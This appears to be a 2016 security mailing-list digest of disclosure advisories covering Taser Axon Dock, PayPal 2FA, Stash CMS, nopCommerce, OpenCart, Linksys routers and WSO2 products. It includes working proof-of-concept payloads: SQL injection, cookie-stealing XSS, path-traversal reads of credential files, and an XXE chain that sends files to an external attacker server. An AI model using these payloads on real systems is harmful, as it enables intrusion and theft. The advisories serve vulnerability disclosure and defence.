Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass

2016-08-15 Thread reggie . dodd30
[TITLE]
Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass

[CREDITS & AUTHORS]
Reginald Dodd
https://www.linkedin.com/in/reginalddodd

[VENDOR & PRODUCT]
Taser International Inc.
Axon Dock - Body-Worn Camera Docking Station
https://www.axon.io/products/dock

[SUMMARY]
The Axon Dock is the camera docking station component of Taser's body-worn 
camera system. It charges body-worn cameras and automatically uploads videos to 
Taser's Evidence.com after body-worn cameras are stored onto it. System owners 
can remotely manage the dock through a web browser by navigating to 
http://. Remote unauthenticated users can obtain administrator access and 
reconfigure the Axon Dock.

[DESCRIPTION]
The Axon Dock stores its core management files in the http:///lua/ 
directory. These files are not protected with basic authentication. Remote 
unauthenticated users can send HTTP POST requests to any of these files: 
* http:///lua/set-passwd.lua
* http:///lua/set-config.lua
* http:///lua/reset-reg.lua
* http:///lua/etm-reboot.lua
* http:///lua/ssl-regen.lua
* http:///lua/diag-cmd.lua
* http:///lua/dvr-update.lua

Once a HTTP POST request with the proper payload body is sent to those files, 
they will allow remote unauthenticated users to:
* Change the password of the default and unchangeable user named "admin".
* Change the network configuration.
* Reveal body-worn camera owner real names, typically law enforcement officers.
* De-register a Axon Dock from Evidence.com to possibly disrupt or 
dissassociate video uploads.
* Reboot a Axon Dock.
* Regenerate the SSL certificate
* Run Diagnostics on the Axon Dock
* Update the firmware of the Axon Dock and any attached cameras
* Repair any attached cameras
* It was discovered that an intentionally hidden feature could allow users to 
transfer body-worn camera videos to any ftp server other than evidence.com. The 
HTML DIV tag of this feature was hidden with CSS (display:none). This feature 
uses ftp to transfer videos. It is accessible to remote unauthenticated users, 
as well. The device uses the /lua/set-config.lua file to enable this feature. I 
created a ftp server to test it. The ftp credentials were sent via the GUI and 
re-sent several times via Burp Suite. I was able to enable it, but it 
constantly showed as not being properly configured (red instead of green 
status). I did not notice any network traffic in wireshark on the ftp port of 
my ftp server. However, I did not have a body-worn camera available to 
accurately confirm that this feature does not work.

[AFFECTED VERSIONS] 
Vulnerable Version(s): 3.1.160322.2252 and possibly all prior versions
Fixed Version: Version 3.2.160726.1852

[SOLUTION]
Taser stated that they would centrally push out version 3.2.160726.1852 to all 
Axon Docks on August 8, 2016. If your dock is not updated, try to update the 
dock manually in the firmware section of the remote console. Contact Taser if 
you have any complications.

[TIMELINE]
July 18-20,2016 - Discovered and validated with multiple exploits.
July 21, 2016 - My findings and exploits were dislosed to Taser. They 
immediately acknowledged the issues.
July 22, 2016 - Taser stated that a fix would be available in 2 weeks.
July 31, 2016 - CVE-ID was requested from MITRE
August 1, 2016 - MITRE denied the CVE-ID request
August 8,2016 - Allegedly, the fix was to be centrally pushed on this day. 
Although, no docks were updated that were accessible to me.
August 12,2016 - Received reports that some docks were updated with the fix.
August 13, 2016 - Taser sent a confirmation email stating that "all" docks have 
been updated with the fix.
August 15, 2016 - Public Disclosure.


PayPal Inc BB #127 - 2FA Bypass Vulnerability

2016-08-15 Thread Vulnerability Lab
Document Title:
===
PayPal Inc BB #127 - 2FA Bypass Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1903


Release Date:
=
2016-08-12


Vulnerability Laboratory ID (VL-ID):

1903


Common Vulnerability Scoring System:

6.2


Product & Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders.

(Copy of the Homepage: www.paypal.com )


Abstract Advisory Information:
==
The independent vulnerability laboratory researcher (shawar khan) discovered a 
vulnerability in the official PayPal website (api) web-application).
The issue allows an attacker to bypass the 2-factor authentication and mobile 
confirmation which could lead to unauthorized access.



Vulnerability Disclosure Timeline:
==
2016-05-13: Researcher Notification & Coordination (Shawar Khan)
2016-05-14: Vendor Notification (PayPal Inc Bug Bounty Program - Security Team)
2016-05-24: Vendor Response/Feedback (PayPal Inc Bug Bounty Program - Security 
Team)
2016-07-10: Vendor Fix/Patch (PayPal Inc Developer Team)
2016-07-18: Acknowledgements (PayPal Inc Bug Bounty Program - Security Team)
2016-08-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PayPal Inc
Product: PayPal - Online Service Web Application 2016 Q3


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A 2 Factor Authentication Bypass Vulnerability was discovered in the official 
PayPal website (api) web-application).

This vulnerability allows an attacker to bypass the 2FA mechanism for access to 
accounts of paypal without verifying in 
the basic procedure the identity with confirmation. The security vulnerability 
is located in the paypal login portals of 
uk and the paypal preview. Each Portal is having an issue which can lead to a 
full bypass once used in a combined way.

If the user have 2FA activated in his account. Whenever an user logs into his 
account, paypal will ask the 
user to verify the identity. Verification can be made via phone number or by 
confirming the login request 
via paypal mobile app (api). The mechanism mainly prevents unauthorized acccess 
to the account and provides 
an extra layer of security. 

The login portal of paypal preview is missing verification mechanism in it. 
When an user is logged in via paypal 
preview's login portal, the user is logged in without any verification and the 
login is successful but there is 
no settings or anything of interest. When logged in via paypal uk login portal, 
it checks if the user account is already 
signed in from any other portal or not. Once it checks the user is already 
logged in via 
paypal preview (without verification) 
it allows us access to the account without any kind of verification. This is 
the way how 2FA was bypassed in 
paypal due to lack of 2FA protection.


Proof of Concept (PoC):
===
PayPal uses an additional layer of security known as 2-Factor Authentication 
which is used to verify the 
user's identity so no unauthorized access would be allowed. The mechanism 
verifies the user's identity by 
calling or messaging a code to phone number or by confirming the login via 
Mobile App. Without these, 
the account will not be accessed. By following the procedure below the 2FA 
protection can be bypassed:


Site: PayPal ( www.paypal.com )
PayPal UK Login Portal: https://www.paypal.com/uk/cgi-bin/?cmd=_email_receipt
PayPal Preview Login Portal: 
https://www.paypal.com/webapps/garden/page/garden.form


Steps to reproduce:
1. Open PayPal UK Login Portal in a new tab(keep it open)
2. On the other tab, open PayPal Preview Login Portal
3. Login to your account in the URL which is opened in step 2
4. Enter credentials in the new window which appears
5. Refresh the page which was opened in step 1
6. Now you will be logged, Click on view account button which will lead you to 
your account and the 2 step verification will be bypassed


Solution - Fix & Patch:
===
In every login portals, verification checks must be deployed even if the user 
is already logged in. 
This will prevent unauthorized access to the account.


Security Risk:
==
This vulnerability allows an attacker to bypass the 2-factor authentication and 
mobile confirmation 
which could lead to unauthorized access.


Credits & Authors:
==
Shawar Khan - (https://shawarkhan.com) 
[http://www.vulnerability-lab.com/show.php?user=Shawar%20Khan]


Stash v1.0.3 CMS - SQL Injection Vulnerability

2016-08-15 Thread Vulnerability Lab
Document Title:
===
Stash v1.0.3 CMS - SQL Injection Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1899


Release Date:
=
2016-08-10


Vulnerability Laboratory ID (VL-ID):

1899


Common Vulnerability Scoring System:

6


Product & Service Introduction:
===
Stash is a free content management system (CMS). Was written on PHP and uses 
MySQL. Distributed under The Creative Commons License.


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection web vulnerability in the official Stash v1.0.3 content management 
system.


Vulnerability Disclosure Timeline:
==
2016-08-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Stash
Product: Stash - Content Management System (Web-Application) 1.0.3


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql-injection web vulnerability has been discovered in the official 
phpCollab v2.5 content management system.
The vulnerability allows remote attackers to execute own malicious sql commands 
to compromise the application or dbms.

The sql-injection vulnerability is located in the `id` parameter of the 
`./stash/admin/` module GET method request. 
Remote attackers are able to execute own sql commands by usage of the insecure 
`usersedit.php` file GET method request. 
The attack vector of the vulnerability is application-side and the request 
method to inject is GET. The vulnerability 
is a classic select remote sql-injection.

The security risk of the vulnerability is estimated as high with a cvss (common 
vulnerability scoring system) count of 6.0.
Exploitation of the remote sql injection vulnerability requires no user 
interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./stash/admin/

Vulnerable File(s):
[+] usersedit.php

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by remote attackers 
without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability 
follow the provided information and steps below to continue.


PoC: Exploitation
http://stash.localhost:8000/stash/admin/usersedit.php?id=-1'[SQL-INJECTION 
VULNERABILITY!]--


--- Error Exception Logs [SQL] ---
Query error: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near 
''1''' at line 1


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://stash.localhost:8000/stash/admin/usersedit.php?id=-1'[SQL-INJECTION 
VIA ID PARAMETER!]-- 
Mime Type[text/html]
   Request Header:
  Host[stash.localhost:8000]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 
Firefox/47.0]
  Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; 
_pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470585963.1470585617.; 

_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fstash.localhost:8000%2Fdemo%2F1%2F394%2FStash%22%5D;
 _pk_ses.2.bb5e=*]
  Connection[keep-alive]
   Response Header:
  Server[nginx/1.2.1]
  Date[Sun, 07 Aug 2016 16:06:03 GMT]
  Content-Type[text/html]
  Transfer-Encoding[chunked]
  Connection[keep-alive]
  X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1]


Reference(s):
http://stash.localhost:8000/
http://stash.localhost:8000/stash/
http://stash.localhost:8000/stash/admin/
http://stash.localhost:8000/stash/admin/usersedit.php


Solution - Fix & Patch:
===
The sql-injection web vulnerability in the application can be patched by usage 
of a prepared statement in the vulnerable usersedit.php file GET method request.
Disallow the usage of special chars and escape the input/output context of the 
module to prevent further sql-injection attacks.


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the 
useredit.php file GET method request is estimated as high. (CVSS 6.0)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=

Reflected Cross Site Scripting (XSS) Vulnerability in nopcommerce 3.70

2016-08-15 Thread tal argoni
Security Advisory
CVE-ID: N/A
Topic: Reflected Cross Site Scripting (XSS) Vulnerability in
"successful registration" page
Class:  Input Validation
Severity:   Medium
Discovery:  2016-04-28
Vendor Notification:2016-04-28
Vendor response:2016-05-30
Vendor Patch: 2016-05-31
Public Announced: 2016-08-15
Credits:Tal Argoni, CEH from Triad Security [http://www.triadsec.com/]
Affects:nopCommerce, open-source & free e-commerce solution 3.70
Resolved:   Version 3.8

I. Background
nopCommerce is open-source e-commerce shopping cart web application
written in MVC.NET. After
anonymous user successfully registered the application, the
application return the user a successful
registration page with "continue to the shop" button. The
redirection's parameter (returnurl) value is
supplied by the user and echo without output validation to the browser.

II. Problem Description
Reflected cross-site scripting vulnerabilities arise when data is
copied from a request and echoed into
the application's immediate response in an unsafe way. The injected
code is not stored within the
application itself; it is only impacts users who open a maliciously
crafted link or third-party web page.
The attack string is included as part of the crafted URI or HTTP
parameters, improperly processed by the
application, and returned to the victim.
Exploit code/POC:
http://VulnopCommerce/registerresult/1?returnurl=%2fcustomer%2finfo'%3balert("hacked+by+triad+s
ecurity")%3b%2f%2f

III. Impact
The attacker-supplied code can perform a wide variety of actions, such
as stealing the victim's session
token or login credentials, performing arbitrary actions on the
victim's behalf, and logging their
keystrokes.
IV. Workaround
You can work around this problem by doing the following:
1. It is recommended to use HTML-encoded at any point where it is
copied into application
responses.

V. Solution
Download vendor patch from http://www.nopcommerce.com .
Update to version 3.8

VI. References
http://www.triadsec.com/
https://www.linkedin.com/in/talargoni
https://github.com/nopSolutions/nopCommerce/commit/364091c16bae533a6c00c0f3bd920ed15da25f
77
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


Linksys E2500 and E1200 (Unauth Command Injection)

2016-08-15 Thread samhuntley84
Linksys E2500 and E1200 suffer from missing command injection issue in parental 
control parameters. This allows an attacker to change the control the device 
remotely.

Combining the attack of no authorization control, it allows an attacker to 
actually execute unauthenticated command injection attack and thus control the 
entire device.

More info at:
http://www.samuelhuntley.com/?p=141
http://www.samuelhuntley.com/?p=135

Initial disclosure date: 04/12/16
Fixed date as per Linksys contact: 7/4/16
Linksys contact: Benjamin Samuels,  Calvin Clark (secur...@linksys.com)


Linksys E1200 and E2500 (Missing authorization on parental control)

2016-08-15 Thread samhuntley84


Linksys E1200 hardware version 2.2 and firmware version 2.0.07 (build 2) suffer 
from missing authorization control on parental control page. This allows an 
attacker to change the parental controls set up by parents  to keep kids safe 
from visiting adult sites and probably compromise a kid’s device.

Info at 
http://www.samuelhuntley.com/?p=132
http://www.samuelhuntley.com/?p=143

Initial disclosure date: 04/12/16
Fixed date as per Linksys contact: 7/4/16
Linksys contact: Benjamin Samuels,  Calvin Clark (secur...@linksys.com)


OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)

2016-08-15 Thread hamedizadi
###

# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability

###

Information

Author: Hamed Izadi 
Email: array("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important


Description

By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in OpenCart v2.0.3.1:

/opencart/index.php?route=product/product_id=1
(product_id - GET)

XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//

Example: 
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//

After opening the above URL, click on "Add to Wish List" & "Compare this 
Product" icons,
and view the alert window.
 



Solution

Upgrade to newer version


Credits & Authors

These issues have been discovered by Hamed Izadi



###

# Iran

# L U Arg

###


OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)

2016-08-15 Thread hamedizadi
###

# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability

###

Information

Author: Hamed Izadi 
Email: ("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important


Description

By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in OpenCart v2.0.3.1:

/opencart/index.php?route=product/product_id=1
(product_id - GET)

XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//

Example: 
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//

After opening the above URL, click on "Add to Wish List" & "Compare this 
Product" icons,
and view the alert window.
 



Solution

Upgrade to newer version


Credits & Authors

These issues have been discovered by Hamed Izadi



###

# Iran

# L U Arg

###


OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)

2016-08-15 Thread hamedizadi
###

# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability

###

Information

Author: Hamed Izadi 
Email: ("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important


Description

By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details

Proof of Concept URLs for XSS in OpenCart v2.0.3.1:

/opencart/index.php?route=product/product_id=1
(product_id - GET)

XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//

Example: 
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//

After opening the above URL, click on "Add to Wish List" & "Compare this 
Product" icons,
and view the alert window.
 



Solution

Upgrade to newer version


Credits & Authors

These issues have been discovered by Hamed Izadi



###

# Iran

# L U Arg

###


WSO2-CARBON v4.4.5 CSRF / DOS

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt

[+] ISR: ApparitionSec


Vendor:

www.wso2.com



Product:
==
Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Cross Site Request Forgery / DOS



CVE Reference:
==
CVE-2016-4315




Vulnerability Details:
=

The attack involves tricking a privileged user to initiate a request by 
clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101


The getSafeText() Function and conditional logic below processes the "action" 
parameter with no check for inbound CSRF attacks.

String cookie = (String) 
session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, 
session);

try {   
if ("restart".equals(action)) {
client.restart();
 } else if ("restartGracefully".equals(action)) {
   client.restartGracefully();
 } else if ("shutdown".equals(action)) {
 client.shutdown();
  } else if ("shutdownGracefully".equals(action)) {
  client.shutdownGracefully();
}
 } catch (Exception e) {
  response.sendError(500, e.getMessage());
   return;
 }



Exploit code(s):
===
  
Shutdown the Carbon server

https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;>Shut
 it down!



Disclosure Timeline:
==
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt

[+] ISR: ApparitionSec


Vendor:
=
www.wso2.com



Product:
==
Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
===
Persistent / Reflected
Cross Site Scripting (XSS) - Cookie Disclosure



CVE Reference:
==
CVE-2016-4316



Vulnerability Details:
=

WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side 
scripts into web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access 
controls such as the same-origin policy,
stealing session cookies and used as a platform for further attacks on the 
system.


Exploit code(s)
===


Persistent XSS:

GET Request
https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie)
   


Request two is POST
/carbon/identity-mgt/challenges-mgt-finish.jsp

setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+%
 
3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS


Then XSS payload will be listed here in below URL:

https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu

Finally when victim clicks to "Delete" entry on the page the XSS is executed.

Here is stored payload from the HTML source

Delete


///


Reflected XSS 

XSS #1 
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E


XSS #2 
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL


XSS #3
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true


XSS #4
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server=

XSS #5
https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


XSS #6
https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true=



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The 

WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION

2016-08-15 Thread apparitionsec
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt

[+] ISR: ApparitionSec


Vendor:
===
www.wso2.com



Product:

Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Local File Inclusion (LFI)



CVE Reference:
==
CVE-2016-4314



Vulnerability Details:
=

An authenticated user can download configuration files in the filesystem via 
downloadArchivedLogFiles operation in LogViewer admin service.
The request to the admin service accepts a file path relative to the carbon log 
file directory (i.e. /repository/logs)
hence can access any file in the file system.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098


Example: accessing the registry.xml file via Local File Inclusion exposes the 
MySQL passwords.

mysql-db

jdbc:mysql://localhost:3306/regdb
regadmin
regadmin
com.mysql.jdbc.Driver
80
6000
5




Exploit code(s):
===

LFI to read Database creds, truststore key file, web.xml etc...

1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml==

2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml

3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
 

4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt

[+] ISR: ApparitionSec


Vendor:
=
www.wso2.com



Product:

Wso2 Identity Server v5.1.0

As the industry’s first enterprise identity bus (EIB), WSO2 Identity Server is 
the central backbone
that connects and manages multiple identities across applications, APIs, the 
cloud, mobile, and Internet
of Things devices, regardless of the standards on which they are based. The 
multi-tenant WSO2 Identity Server
can be deployed directly on servers or in the cloud, and has the ability to 
propagate identities across geographical
and enterprise borders in a connected business environment.



Vulnerability Type:

XML External Entity / CSRF


CVE Reference(s):
===
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)


Vulnerability Details:
=


WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can be 
exploited when XML input containing a reference to an
external entity is processed by a weakly configured XML parser. The attack 
leads to the disclosure and exfiltration of confidential
data and arbitrary system files, denial of service, server side request 
forgery, port scanning from the perspective of the machine
where the parser is located (localhost), and other system impacts.

The exploit can be carried out locally by an internal malicious user or remote 
via CSRF if an authenticated user clicks an attacker
supplied link or visits a evil webpage. In case of WSO2IS system files can be 
read / exfiltrated to the remote attackers server
for safe keeping -_- 

References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096



Exploit code(s):
===

XXE POC, exfiltrate the victims Windows hosts file to our remote server.

1) Form for the XXE POST request.

https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false;
 method="post"> 



http://attackserver:8080/payload.dtd;>
%dtd;]>







document.getElementById('XXE').submit()



2) DTD file on attacker server.


http://attackserver:8080?%file;'>">
%all;


3) On attack server create listener for the victims HTTP request.

python -m SimpleHTTPServer 8080




Disclosure Timeline:

Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:
===
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


[SECURITY] [DSA 3648-1] wireshark security update

2016-08-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-3648-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
August 12, 2016   https://www.debian.org/security/faq
- -

Package: wireshark
CVE ID : CVE-2016-6504 CVE-2016-6505 CVE-2016-6506 CVE-2016-6507 
